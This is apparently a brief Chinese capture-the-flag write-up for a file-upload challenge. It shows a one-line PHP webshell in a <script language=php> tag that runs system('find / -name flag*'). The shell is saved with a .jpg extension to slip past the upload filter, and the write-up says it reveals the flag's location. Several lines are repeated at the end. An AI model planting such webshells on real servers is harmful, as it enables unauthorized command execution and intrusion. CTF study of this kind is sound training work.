0、打开网页,查看源代码
注意注释内容:upload.php
1、打开upload.php文件
文件上传,又是有关木马传入类型的题
2、构造一句话木马,查询flag文件
<script language=php>system("find / -name flag*");</script>
先创建文本文档,再修改扩展名为.jpg
3、上传一句话木马并打开
发现有关flag的储存路径信息
注意注释内容:upload.php
文件上传,又是有关木马传入类型的题
<script language=php>system("find / -name flag*");</script>
先创建文本文档,再修改扩展名为.jpg
发现有关flag的储存路径信息